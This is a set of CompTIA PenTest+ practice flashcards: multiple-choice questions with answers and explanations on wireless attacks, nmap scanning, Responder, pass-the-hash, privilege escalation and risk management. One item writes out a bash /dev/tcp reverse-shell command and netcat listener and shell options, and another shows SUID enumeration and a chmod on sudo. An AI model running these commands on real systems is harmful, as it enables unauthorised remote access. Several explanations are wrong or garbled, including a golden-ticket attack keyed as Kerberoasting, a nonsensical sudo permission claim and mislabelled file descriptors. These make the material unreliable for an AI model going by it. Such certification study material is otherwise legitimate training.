CompTIA PenTest+ (PT0-001) Practice Certifications Exams (Jason DIon 2 of 6) Flashcards
You are conducting a wireless penetration test against an organization. You have identified that they are using WEP encryption on their wireless access points. You are impatient and do not want to wait to collect enough packets to find a repeated initialization vector. You decide to extract part of the key material from one of the packets and use it to send an ARP request to the AP. Which of the following exploits did you utilize in this attack? A.Deuthentication attack B.Downgrade attack C.Fragmentation attack D.Karma attack
C.Fragmentation attack
Explanation:
OBJ-3.3: A fragmentation attack obtains the pseudorandom generation algorithm (PRGA) of network packets used in WEP. The PRGA can be used to craft encrypted packets that you can inject into the access point. These injected packets can speed up cracking the WEP password; otherwise, it might take a while to receive enough packets to get the repeated IV. In a fragmentation attack, you extract part of the key material from at least one packet and use this to send an ARP request to the AP. If successful, the AP responds with more of the key material in the packet echoed back to you. You repeat this process many times until around 1500 bytes of the PRGA is captured, at which point you can then use a packet crafting tool to begin the injection process.
A recent threat has been announced in the cybersecurity world, stating a critical vulnerability in a particular operating system’s kernel. Unfortunately, your company has not maintained a current asset inventory, so you are unsure of how many of your servers may be affected. What should you do to find all of the affected servers within your network?
A.Manually review the syslog servers log’s
B.Conduct a service discovery scan on the network
C.Conduct an OS fingerprinting scan across the network
D.Conduct a packet capture of data traversing the server network
C.Conduct an OS fingerprinting scan across the network
Explanation:
OBJ-2.1: By utilizing operating system fingerprinting using a tool like nmap, you can identify the servers running each version of an operating system. This will give you an accurate list of the possibly affected servers. Once you have this list, you can focus your attention on just those servers that need further inspection and scanning. Manually review the Syslog server’s log would take too long, and would not find servers that don’t send their logs to the Syslog server. Conducting a packet capture would only allow you to find the server actively transmitting data during the period of time you are capturing. Conducting a service discovery scan would not identify which servers are running which operating systems effectively. For example, if you see that the Apache web service is running on port 80, it doesn’t indicate running Linux or Windows as the underlying server.
During your annual cybersecurity awareness training in your company, the instructor states that employees should be careful about what information they post on social media. According to the instructor, if you post too much personal information on social media, such as your name, birthday, hometown, and other personal details, it is much easier for an attacker to conduct which type of attack to break your passwords? A.Rainbow table attack B.Brute force attack C.Cognitive password attack D.Birthday attack
C.Cognitive password attack
Explanation:
OBJ-2.4: A cognitive password is a form of knowledge-based authentication that requires a user to answer a question, presumably something they intrinsically know, to verify their identity. If you post a lot of personal information about yourself online, this password type can easily be bypassed. For example, during the 2008 elections, Vice Presidential candidate Sarah Palin’s email account was hacked because a high schooler used the “reset my password” feature on Yahoo’s email service to reset her password using the information that was publically available about Sarah Palin (like her birthday, high school, and other such information).
You just visited an e-commerce website by typing in its URL during a vulnerability assessment. You discovered that an administrative web frontend for the server’s backend application is accessible over the internet. Testing this frontend, you discovered that the default password for the application is accepted. Which of the following recommendations should you make to the website owner to remediate this discovered vulnerability? (SELECT THREE)
A.Whitelist all specific IP blocks that use this application
B.Rename the URL to a more obscure name
C.Require two-factor authentication for access for the application
D.Conduct a penetration test against the organizations IP space
E.Change the username and default password
F.Require an alphanumeric passphrase for the applications default password
A.Whitelist all specific IP blocks that use this application
C.Require two-factor authentication for access for the application
E.Change the username and default password
Explanation
OBJ-5.3: First, you should change the username and default password since using default credentials is extremely insecure. Second, you should implement a whitelist for any specific IP blocks with access to this application’s administrative web frontend since it should only be a few system administrators and power users. Next, you should implement two-factor authentication to access the application since two-factor authentication provides more security than a simple username and password combination. You should not rename the URL to a more obscure name since security by obscurity is not considered a good security practice. You also should not require an alphanumeric passphrase for the application’s default password. Since it is a default password, you can not change the password requirements without the vendor conducting a software update to the application. Finally, while it may be a good idea to conduct a penetration test against the organization’s IP space to identify other vulnerabilities, it will not positively affect remediating this identified vulnerability.
A cybersecurity analyst conducts proactive threat hunting on a network by correlating and searching the Sysmon and Windows Event logs. The analyst uses the following query as part of their hunt:
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Query: “mimikatz” NOT “EventCode=4658” NOT “EventCode=4689” EventCode=10 | stats count by _time, SourceImage, TargetImage, GrantedAccess
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Based on the query above, which of the following potential indicators of compromise is the threat hunter relying on? A.Processor consumption B.Unatuhorized software C.Irregular peer-to-peer communication D.Data exfiltration
B.Unatuhorized software
Explanation
OBJ-4.2: This is a difficult question, but you should see a keyword in the query, “mimikatz.” Mimikatz is a leading post-exploitation tool that dumps passwords from memory, as well as hashes, PINs, and Kerberos tickets. Other useful attacks it enables are pass-the-hash, pass-the-ticket, or building Golden Kerberos tickets. This makes post-exploitation lateral movement within a network easy for attackers. It is definitely considered unauthorized software and should be immediately alerted upon if discovered in your network. Data exfiltration is the process by which an attacker takes data that is stored inside of a private network and moves it to an external network. Processor consumption is an IoC that monitors the per-process percentage of CPU time to show what causes the problem. Irregular peer-to-peer communication occurs when hosts within a network establish connections over unauthorized ports or data transfers.
A cybersecurity analyst at a mid-sized retail chain has been asked to determine how much information can be gathered from the store’s public webserver. The analyst opens up the terminal on his Kali Linux workstation and uses netcat to gather some information.
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
[root@kali] nc test.diontraining.com 80
HEAD / HTTP/1.1
HTTP/1.1 200 OK Date: Sun, 12 Jun 2020 14:12:45 AST Server: Apache/2.0.46 (Unix) (Red Hat/Linux) Last-modified: Thu, 16 Apr 2009 11:20:14 PST ETgag: “1986-69b-123a4bc6” Accept-Ranges: bytes Content-Length: 6485 Connection: close Content-Type: text/html -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
What type of action did the analyst perform, based on the command and response above? A.SQL Injection B.Banner Grabbing C.Querying the Whois database D.Cross-site scripting
B.Banner Grabbing
Explanation:
OBJ-4.2: The analyst conducted banner grabbing. Banner grabbing is a technique used to learn information about a computer system on a network and the services running on its open ports. In the question, the command “nc test.diontraining.com 80” was used to establish a connection to a target web server using netcat, then send an HTTP request (HEAD / HTTP/1.1). The response contains information about the service running on the webserver. In this example, the server software version (Apache 2.0.46) and the operating system (Red Hat Linux). Cross-Site Scripting (XSS) attacks are a type of injection in which malicious scripts are injected into otherwise benign and trusted websites. XSS attacks occur when an attacker uses a web application to send malicious code, generally in a browser side script, to a different end-user. SQL injection is a code injection technique used to attack data-driven applications where malicious SQL statements are inserted into an entry field for execution, such as dumping the database contents to the attacker. A query to the WHOIS database would return information on the website owner, not the server’s operating system.
You are conducting a vulnerability assessment when you discover a critical web application vulnerability on one of your Apache servers. Which of the following files would contain the Apache server's logs if your organization uses the default naming convention? A.apache_log B.access_log C.httpd_log D.http_log
B.access_log
Explanation: OBJ-2.3: On Apache web servers, the logs are stored in a file named access_log. By default, the file can be located at /var/log/httpd/access_log. This file records all requests processed by the Apache server. The WebSphere Application Server uses the httpd_log file for z/OS, which is a very outdated server from the early 2000s. The http_log file is actually a header class file in C used by the Apache web server's pre-compiled code that provides the logging library but does not contain any actual logs itself. The file called apache_log is actually an executable program that parses Apache log files within in Postgres database.
What should administrators perform to reduce a system's attack surface and remove unnecessary software, services, and insecure configuration settings? A.Hardening B.Harvesting C.Stealthing D.Windowing
A.Hardening
Explanation:
OBJ-5.3: Hardening is usually the process of securing a system by reducing its surface of vulnerability, which is larger when a system performs more functions; in principle, a single-function system is more secure than a multipurpose one. Reducing available ways of attack typically includes changing default passwords, removing unnecessary software, unnecessary usernames or logins, and disabling or removing unnecessary services. Windows is the use of windows for the simultaneous display of more than one item on a screen. Harvesting is the process of gathering data, normally user credentials. Stealthing is a made-up term in this question.
A penetration tester has been hired to conduct an assessment, but the company wants to exclude social engineering from the list of authorized activities. Which of the following documents would include this limitation? A.Service level agreement B.Memorandum of understanding C.Rules of engagement D.Acceptable use policy
C.Rules of engagement
Explanation:
OBJ-1.1: While the contract documents’ network scope will define what will be tested, the rules of engagement define how that testing is to occur. Rules of engagement can state things like no social engineering is allowed, no external website scanning, etc. A memorandum of understanding (MOU) is a preliminary or exploratory agreement to express an intent to work together that is not legally binding and does not involve monetary exchange. A service level agreement contains the operating procedures and standards for a service contract. An acceptable use policy is a policy that governs employees’ use of company equipment and internet services.
Your organization's networks contain 4 subnets: 10.0.0.0, 10.0.1.0, 10.0.2.0, and 10.0.3.0. Using nmap, how can you scan all 4 subnets using a single command? A.nmap -Pn 10.0.0.0/25 B.nmap -Pn 10.0.0.0,1.0.2.0,3.0 C.nmap -Pn 10.0.0.0/23 D.nmap -Pn 10.0.0-3.0
D.nmap -Pn 10.0.0-3.0
Explanation:
OBJ-4.1: The simplest way to scan multiple subnets adjacent to each other is to use the -Pn tells the command to conduct a host-only scan of every IP in this target space without using ping. Using the dash (-) in the IP address means to scan “this network through this network.” So, 10.0.0-3.0 will scan every IP from 10.0.0.0 through 10.0.3.255.
You are conducting a network-based exploit against a Windows-based network. After running Responder in Kali Linux for about 15 minutes, you see the following output on your screen:
To validate if your attack was successful, you also analyze a Wireshark packet capture of this attack. A portion of that Wireshark packet capture is shown here:
Based on the output and packet capture above, which of the following types of exploits did you use?
A.Pass the hash attack
B.FTP Exploit
C.LLMNR Exploit
D.DNS cache poisoning
C.LLMNR Exploit
Explanation:
OBJ-3.2: Windows computers do not rely on DNS for name resolution within the internal networks. Instead, they rely on NetBIOS Name Service (NBNS) queries. Since Windows Vista, though, NBNS queries have been replaced with the Link-Local Multicast Name Resolution (LLMNR) protocol. The Responder tool in Kali Linux is used to conduct NBNS, LLMNR, and DNS name resolution exploits. In this example, Responder is being used to answer the Windows host asking for name resolution for the system called “wpad” but provides the IP for the Kali Linux machine instead of the correct IP. The first highlighted section shows the LLMNR query for the host “wpad” being sent by the Windows 7 host and answered by the Kali host running Responder. The last highlighted section shows the Windows 7 host getting the wpad.dat file by providing their credentials to the Kali host. There are several clues in this question to the right answer. First, the question mentions that you waited 15 minutes. Within Windows networks, the older NetBIOS system, each Windows machine would send out a broadcast message with its IP and WINS name every 10-15 minutes. Some of this functionality remains within LLMNR, too. But, the easier clue to identify is from the Wireshark packet capture. It clearly shows the protocol being used in lines 1212 through 1216 as LLMNR during the query and response. For this question, I was even nice enough to highlight that portion is red, but don’t expect the exam to be nearly as kind!
You are conducting a penetration test against an organization's Windows network. You have dumped the hash of their krbtgt account from the server's memory and used it to create golden tickets. Which of the following types of privilege escalation have you performed? A.Insecure sudo B.DLL Hijacking C.cPassword extraction D.Kerboroasting
D.Kerboroasting
Explanation:
OBJ-3.5: Kerberoasting is the dumping of the hash of the krbtgt (kerberos ticket-granting ticket) from a server’s memory using a domain-based user account. This is then used to create new golden tickets that allow any domain user to request the Ticket Granting Ticket from a domain service account. This can be cracked offline to reveal the plaintext password of the account. Many Windows services run with administrative privileges, and most system administrators don’t frequently change these passwords. This can lead to an attacker gaining access to a domain for a long period of time.
You are analyzing the following network utilization report because you suspect one of the servers has been compromised.
-=-=-=-=-=–=-=-=-=-=–=-=-=-=-=–=-=-=-=-=–=-=-=-=-=–=-=-=-=-=-
IP Address Name Uptime Historical Current
192.168.20.2 web01 7D 12H 32M 06S 42.6 GB 44.1 GB
192.168.20.3 webdev02 4D 07H 12M 45S 1.95 GB 2.13 GB
192.168.20.4 dbsvr01 12D 02H 46M 14S 3.15 GB 24.6 GB
192.168.20.5 marketing01 2D 17H 18M 41S 5.2 GB 4.9 GB
-=-=-=-=-=–=-=-=-=-=–=-=-=-=-=–=-=-=-=-=–=-=-=-=-=–=-=-=-=-=-
Based on the report above, which of the following servers do you suspect has been compromised and should be investigated further? A.web01 B.webdev02 C.dbsrv01 D.marketing01
C.dbsrv01
Explanation:
OBJ-3.7: Due to the considerable increase in network utilization on dbsvr01, it should be suspected of compromise and further investigated. The server has a historical average utilization of only 3.15 GB per month, but this month there has been an increase to 24.6 GB of usage. This increase is nearly 8x more than the previous month when all of the other servers stayed relatively constant. This indicates a possible compromise of the database server (dbsvr01) and a data breach or data exfiltration.
Your company has just announced a change to an “API first” model of software development. As a cybersecurity analyst, you are immediately concerned about the possibility of an insecure deserialization vulnerability in this model. Which of the following is the primary basis for an attack against this vulnerability?
A. Accepting serialized objects from objects from untrusted sources or the use of serialized non-primitive data may lead to remote code execution
B.Lack of input validation cloud allow for a SQL attack
C.Lack of input validation could lead to a cross-site scripting attack
D. Insufficient logging and monitoring makes it impossible to detect when insecure deserialization vulnerabilities are exploited
A. Accepting serialized objects from objects from untrusted sources or the use of serialized non-primitive data may lead to remote code execution
Explanation:
OBJ-2.4: When implementing an API, objects in memory from one computer can be serialized and passed to another for deserialization. If the API user is malicious, they may create a fictitious object, appropriately serialize it, and then send it through the API for execution. The only model for defeating this approach is to allow the API to be exposed to trusted sources or to not serialize anything with potentially executable source code (i.e., non-primitive data types). Cross-site scripting and SQL attacks are not a concern for an API first model. While stuffiest logging and monitoring would prevent an analyst from detecting if a deserialization vulnerability was exploited, these alone would not be the basis for an attack against deserialization.
In 2014, Apple's implementation of SSL had a severe vulnerability that, when exploited, allowed an attacker to gain a privileged network position that would allow them to capture or modify data in an SSL/TLS session. This was caused by poor programming in which a failed check of the connection would exit the function too early. Based on this description, what is this an example of? A.Use of insecure functions B.Insecure object reference C.Improper error handling D.Insufficient logging and monitoring
C.Improper error handling
Explanation:
OBJ-2.3: This is an example of an improper error handling vulnerability. A well-written application must be able to handle errors and exceptions gracefully. The main goal must be for the application not to fail and allows the attacker to execute code or perform an injection attack. One famous example of an improper error handling vulnerability is Apple’s GoTo bug, as described above. For more details on this particular vulnerability, please see CVE-2014-1266. Insecure object reference refers to when a reference to an internal implementation object, such as a file or database key, is exposed to users without any other access control. Insufficient logging and monitoring allow attackers to achieve their goals without being detected due to the lack of monitoring and timely response by defenders. The use of insecure functions occurs in the C language when legacy functions like strcpy() are used. These insecure functions can lead to buffer overflow and other exploits being successful against a program.
During your reconnaissance, you have determined that your client’s employees all use iPhones that connect back to the corporate network over a secure VPN connection. Which of the following methods would MOST likely be the best method for exploiting these?
A.Identify a jailbroken device for easy exploitation
B.Use web-based exploits against the devices web interfaces
C.USe social eningeering to trick a user into opening a malicious APK
D.Use a too like ICSSPLOIT to target specific vulnerabilities
A.Identify a jailbroken device for easy exploitation
Explanation:
OBJ-2.5: When targeting mobile devices, you must first determine if the company uses iPhones or Android-based devices. If they are using an iPhone, it becomes much more difficult to attack since iPhone users can only install trusted apps from the App Store. If the user has jailbroken their phone, they can sideload apps and other malware. After identifying a jailbroken device, you can use social engineering to trick the user into installing your malicious code and then take control of their device.
Praveen is currently investigating activity from an attacker who compromised a host on the network. The individual appears to have used credentials belonging to a janitor. After breaching the system, the attacker entered some unrecognized commands with very long text strings and then began using the sudo command to carry out actions. What type of attack has just taken place? A.Social engineering B.Phishing C.Session hijacking D.Privilege escalation
D.Privilege escalation
Explanation:
OBJ-3.5: The use of long query strings points to a buffer overflow attack, and the sudo command confirms the elevated privileges after the attack. This indicates a privilege escalation has occurred. While the other three options may have been used as an initial access vector, they cannot be confirmed based on the question’s details. Only a privilege escalation is currently verified within the scenario due to the use of sudo.
You are watching as a penetration tester is conducting an engagement against Dion Training’s network. You see the following commands and output in their terminal:
-=-=-=-=-=-=- # find / -perm +4000 -user root -type f -print /usr/sbin/exim4 /usr/bin/sudo /usr/bin/passwd /usr/games/mahjong
# chmod 4111 /usr/bin/sudo -=-=-=-=-=-=-
Which of the following vulnerabilities is the penetration tester trying to exploit? A.Unquoted service path vulnerability B.Unsecure SUDO vulnerability C.Sticky bit vulnerability D.Kernel vulnerability
B.Unsecure SUDO vulnerability
Explanation:
OBJ-3.5: This penetration tester is attempting to exploit an unsecure SUDO vulnerability. First, they ran the find command and specified that it should look for permissions that follow the numerical representation of the SUID bit permission (+4000). It also looked for any files owned by the root user and were considered regular files (f), then it displays them to the screen. There were 4 files found in this example, one of which was the /usr/bin/sudo file. Next, the penetration tester attempted to perform a chmod against the /usr/bin/sudo file and set its permissions to 4111. If they were successful, this would change the permissions to allow the user, the group, and everyone else on this computer to execute the sudo command. When the sudo command is run, because it has the SUID bit set, the user can run the command as the root user. For this reason, the /usr/bin/sudo should have its permissions set to 4411 and not 4111.
The local electric power plant contains both business networks and ICS/SCADA networks to control their equipment. Which technology should the power plant’s security administrators look to implement first as part of configuring better defenses for the ICS/SCADA systems?
A.Automated patch deployment
B.Log consolidation
C.Intrusion prevention system
D.Anti-virus software
C.Intrusion prevention system
Explanation:
OBJ-2.5: Since this question is focused on the ICS/SCADA network, the best solution would be implementing an Intrusion Prevention System. ICS/SCADA machines utilize very specific commands to control the equipment and to prevent malicious activity. You could set up strict IPS rules to prevent unknown types of actions from being allowed to occur. Log consolidation is a good idea, but it won’t prevent an issue and therefore isn’t the most critical thing to add first. Automated patch management should not be conducted, as ICS/SCADA systems must be tested before conducting any patches. Often, patches will break ICS/SCADA functionality. Anti-virus software may or may not be able to run on the equipment, as well, since some ICS/SCADA systems often do not rely on standard operating systems like Windows.
What role does the red team perform during a tabletop exercise (TTX)? A.Adversary B.Cybersecurity analyst C.System Administrator D.Network defender
A.Adversary
Explanation:
OBJ-1.3: The red team acts as the adversary, attempting to penetrate the network or exploit it as a rogue internal attacker. The red team might be selected members of in-house security staff, a third-party company, or a consultant contracted to perform the role. The blue team operates the security system with a focus on detecting and repelling the red team. The blue team usually consists of system administrators, cybersecurity analysts, and network defenders.
You are working as a server administrator at Dion Training. You unlock the server room door using your proximity badge and walk through the door. Before the door shuts, another person walks in behind you. What social engineering technique did this person utilize? A.Spoofing B.Tailgating C.Shoulder surfing D.Impersonation
B.Tailgating
Explanation:
OBJ-3.6: Tailgating (or piggybacking) is a means of entering a secure area without authorization by following close behind the person that has been allowed to open the door or checkpoint. This might be done without the target’s knowledge or might be a means for an insider to allow access to someone without recording it in the building’s entry log. Another technique is to persuade someone to hold a door open for them.
You are attempting to exploit a network-based vulnerability against a Windows server. You configure Metasploit with the following options below and enter the run command.
Which of the following types of exploits are you attempting?
A.Credential brute forcing
B.Sandbox escape
C.Pass the hash
D.Credentials harvesting
C.Pass the hash
Explanation:
OBJ-4.3: A pass the hash attacks is a network-based attack where the attacker steals hashed user credentials and uses them as-is to try to authenticate to the same network the hashed credentials originated on. When authenticating with a username and password, the password is hashed once you type it in. Therefore, the computer doesn’t recognize a difference between the password and the hash itself. So, if you use psexec to send the hash to the system directly, it can be used to authenticate you as that user without actually knowing the user’s password. The key to answering this question is identifying that the smbpass parameter is being set to a password hash of a specified user.
A cybersecurity analyst is analyzing what they believe to be an active intrusion into their network. The indicator of compromise maps to suspected nation-state group that has strong financial motives, APT 38. Unfortunately, the analyst finds their data correlation lacking and cannot determine which assets have been affected, so they begin to review the list of network assets online. The following servers are currently online: PAYROLL_DB, DEV_SERVER7, FIREFLY, DEATHSTAR, THOR, and DION. Which of the following actions should the analyst conduct first?
A.HArdening the DEV_SERVER7 server
B.Logically isolate the PAYROLL_DB server from the production network
C.Conduct a Nessus scan of the FIREFLY server
D.Conduct a data criticality and prioritization analysis
D.Conduct a data criticality and prioritization analysis
Explanation:
OBJ-2.3: While the payroll server could be assumed to holds PII, financial information, and corporate information, the analyst would only be making that assumption based on its name. Even before an incident response occurs, it would be a good idea to conduct a data criticality and prioritization analysis to determine what assets are critical to your business operations and need to be prioritized for protection. After an intrusion occurs, this information could be used to better protect and defend those assets against an attacker. Since the question states the analyst is trying to determine which server to look at based on their names, it is clear this organization never performed a data criticality and prioritization analysis and should do that first. After all, with names like FIREFLY, DEATHSTAR, THOR, and Dion, the analyst has no idea what is stored on those systems. For example, how do we know that DEATHSTAR doesn’t contain their credit card processing systems that would be a more lucrative target for APT 38 than the PAYROLL_DB. The suggestions of hardening, logically isolating, or conducting a vulnerability scan of a particular server are random guesses by the analyst since they don’t know which data they should focus on protecting or where the attacker is currently.
What should be done NEXT if the final set of security controls does not eliminate all of the risks in a given system?
A.You should accept the risk if the residual risk is low enough
B.You should ignore any remaining risk
C.You should continue to apply additional controls until there is zero risk
D.You should remove the current controls since they are not completely effective
A.You should accept the risk if the residual risk is low enough
Explanation:
OBJ-1.3: In most cases, you will be unable to remove all risk. Instead, it would be best to mitigate the risk to a low enough level to accept the residual risk. Removing the controls would add to the risk, which is a bad course of action to select. Ignoring the remaining risk is unacceptable; instead, you should acknowledge what risk remains and accept it if it is low enough. If it is not low enough, you should continue to mitigate the risk by adding additional control measures. It is unlikely you will ever be able to get all risk down to zero, but mitigating to a lower level and then accepting the residual risk is a common industry practice.
Rick is upset that he was passed over for a promotion. He decides to take revenge on his nemesis, Mary, who got the job instead of him. Rick sets up a man-in-the-middle attack against Mary's computer by redirecting any layer 2 traffic destined for the gateway to his own computer first. Rick is careful only to affect the traffic associated with Mary's computer and not the entire network. Which type of man-in-the-middle attack is Rick conducting against Mary? A.Evil twin B.IP Spoofing C.ARP cache poisoning D.MAC Spoofing
C.ARP cache poisoning
Explanation:
OBJ-3.2: Based on the scenario, we can eliminate evil twin (focused on wireless access points) and IP spoofing (since this affects layer 3 traffic). While MAC spoofing the gateway’s address might work, it would also affect every computer on this subnet. By conducting an ARP cache poisoning attack, Rick can poison the cache and replace Mary’s computer’s MAC association with his own, allowing him to become the man-in-the-middle between Mary and the default gateway.
What results will the following command yield: NMAP -sS -O -p 80-443 145.18.24.7?
A.A stealth scan that scans ports 80 and 443
B.A stealth scan that scans all open ports excluding ports 80 to 443
C.A stealth scan that scans all ports from 80 to 443 and determines a targets operating system
D.A stealth scan that scans ports 80 to 443
C.A stealth scan that scans all ports from 80 to 443 and determines a targets operating system
Explanation:
OBJ-4.1: When using NMAP, the -sS tells the tool to use a stealth scan using a TCP SYN packet, the -O is used to determine the operating system, and -p dictates which ports to scan. Since the ports were listed as 80-443, this indicates it includes all the ports from 80 through 443.
A penetration tester just entered the following command into a Bash shell on Dion Training’s server:
-=-=-=-=-=-
bash 1>& /dev/tcp/192.168.1.53/31337 0>&1
-=-=-=-=-=-
Before the penetration tester runs that command, what must they run first on their machine? A.nc -nlvp 31337 B.nc 192.168.1.53 31337 C.bash 0>& /dev/tcp/127.0.0.1/31337 1>&0 D.nc -e /bin/sh 192.168.1.53 31337
A.nc -nlvp 31337
Explanation:
OBJ-4.3: The bash command entered by the penetration tester on the Dion Training server is a redirector to send information back to a listener. Therefore, the penetration tester needs to first set up a listener on their own machine. This can quickly be done using netcat to set up a listener on port 31337 (nc -nvlp 31337). The bash command says to redirect the standard output (0) to a TCP socket connected to the IP (192.168.1.53) over port 31337. Then, the standard input (0) is redirected to the standard output (1). Since Bash treats TCP sockets established using this command as a two-way connection, it allows the penetration tester to gain a remote connection to the server by creating a reverse shell. To maintain persistence, the server could be configured using crontab to run this Bash command every day at a certain time, as well.
Which of the following vulnerabilities is the greatest threat to data confidentiality?
A.SSL Server with SSLv3 enabled vulnerability
B.HTTP TRACE/TRACK methods enabled
C.phpinfo information about disclosure vulnerability
D.Web application SQL injection vulnerability
D.Web application SQL injection vulnerability
Explanation:
OBJ-5.1: Each vulnerability mentioned poses a significant risk, but the greatest threat comes from the SQL injection. An SQL injection could allow an attacker to retrieve our data from the backend database directly. Using this technique, the attacker could also alter the data and put it back, and nobody would notice everything that had been changed, thereby also affecting our data integrity. The HTTP TRACE/TRACK methods are normally used to return the full HTTP request to the requesting client for proxy-debugging purposes and allow the attacker to access sensitive information in the HTTP headers. Since this only exposes information in the headers, it minimizes the risk to our system’s data confidentiality. An SSL server with SSLv3 enabled is not ideal since this is an older encryption type, but it still provides some confidentiality. The phpinfo information disclosure vulnerability prints out detailed information on both the system and the PHP configuration. This information by itself doesn’t disclose any information about the data stored within the system, though, so it isn’t a great threat to our data’s confidentiality.
What tool is used to collect wireless packet data?
A.Netcat
B.John The Ripper
C.Aircrack-ng
D.Nessus
C.Aircrack-ng
Explanation:
OBJ-4.2: Aircrack-ng is a complete suite of wireless security assessment and exploitation tools that includes monitoring, attacking, testing, and cracking of wireless networks. This includes packet capture and export of the data collected as a text file or pcap file. John the Ripper is a password cracking software tool. Nessus is a vulnerability scanner. Netcat is used to create a reverse shell from a victimized machine back to an attacker.
Dion Consulting Group has been hired to analyze the cybersecurity model for a new videogame console system. The manufacturer’s team has come up with four recommendations to prevent intellectual property theft and piracy. As the cybersecurity consultant on this project, which of the following would you recommend they implement first?
A.Ensure that all games for the console are distributed as encrypted so that theycan only be decrypted on the game console
B.Ensure that all each individual console has its own unqiue key for decrypting individual licenses and tracking which console has purchased which game
C.Ensure that all screen capture content is visibility watermarked
D.Ensure that all games require excessive storage sizes so that it is difficult for unauthorized parties to distribute
B.Ensure that all each individual console has its own unqiue key for decrypting individual licenses and tracking which console has purchased which game
Explanation: OBJ-5.3: Ensuring that each console has its own unique key will allow the console manufacturer to track who has purchased which games when using digital rights management licensing. This can be achieved using a hardware root of trust, such as a TPM module in the processor. While encrypting the games during distribution will provide some security, the games could be decrypted and distributed by unauthorized parties if the encryption key were ever compromised. The recommendation of making the game arbitrarily large will frustrate both authorized and unauthorized, which could negatively impact sales, so it is a poor recommendation to implement. Visibly watermarking everything will only aggravate the user, provide a negative customer experience, and not help fight software piracy.
What remediation strategies are the MOST effective in reducing the risk to an embedded ICS from a network-based compromise? (Select TWO) A.Patching B.NIDS C.Disabling unused services D.Segmentation
C.Disabling unused services
D.Segmentation
Explanation:
OBJ-2.5: Segmentation is the best method to reduce the risk to an embedded ICS system from a network-based compromise. Additionally, you could disable unused services to reduce the footprint of the embedded ICS. Many of these embedded ICS systems have a large number of default services running. So, by disabling the unused services, we can better secure these devices. By segmenting the devices off the main portion of the network, we can also better protect them. A NIDS might detect an attack or compromise, but it would not reduce the risk of the attack succeeding since it can only detect it. Patching is difficult for embedded ICS devices since they usually rely on customized software applications that rarely provide updates.
During a vulnerability scan of your network, you identified a vulnerability on an appliance installed by a vendor on your network under an ongoing service contract. You do not have access to the appliance’s operating system as the device was installed under a support agreement with the vendor. What is your best course of action to remediate or mitigate this vulnerability?
A.Mark the identified vulnerability as a false positive
B.Try to gain access to the underlying operating system and install the patch
C.Wait 30 days, run the scan again, and determine if the vendor corrected the vulnerability
D.Contact the vendor to provide an update or to remediate the vulnerability
D.Contact the vendor to provide an update or to remediate the vulnerability
Explanation:
OBJ-5.3: You should contact the vendor to determine if a patch is available for installation. Since this is a vendor-supported appliance installed under a service contract, the vendor is responsible for the appliance’s management and security. You should not attempt to gain access to the underlying operating system to patch the vulnerability yourself, as this could void your warranty and void your service contract. Based on the information provided, there is no reason to believe that this is a false positive, either. You should not simply wait 30 days and rerun the scan, as this is a non-action. Instead, you should contact the vendor to fix this vulnerability. Then, you could rerun the scan to validate they have completed the mitigations and remediations.
A project lead reviews the statement of work for an upcoming project that is focused on identifying potential weaknesses in the organization’s internal and external network infrastructure. As part of the project, a team of external contractors will attempt to employ various attacks against the organization. The work statement specifically addresses the utilization of an automated tool to probe network resources in an attempt to develop logical diagrams indicating weaknesses in the infrastructure. Based on this scope of work, what type of activity is to be performed? A.Vulnerability scanning B.Social Engineering C.Penetration testing D.Session hijacking
C.Penetration testing
Explanation:
OBJ-1.3: Penetration testing is the act of using a computer system, an individual network, or another application to find vulnerabilities that an attacker could use to compromise your systems. Penetration testing can also find endpoints with vulnerabilities, which makes the attack surface greater.
Dion Training is hiring a penetration testing firm to conduct an assessment of its corporate network. As part of the contract, the company has specified that it will not provide any network details to the penetration testing firm. Instead, the company wants to see how much information about the network can be found by the penetration testers using open-source research and scanning the corporate network. What type of assessment is this considered? A.White Box B.Red Box C.Black Box D.Gray Box
C.Black Box
Explanation:
OBJ-1.3: In a black box assessment, the penetration tester takes an average hacker’s role with no internal knowledge of the target system. Testers are not provided with any architecture diagrams or source code that is not publicly available. A black-box penetration test determines the vulnerabilities in a system that are exploitable from outside the network.
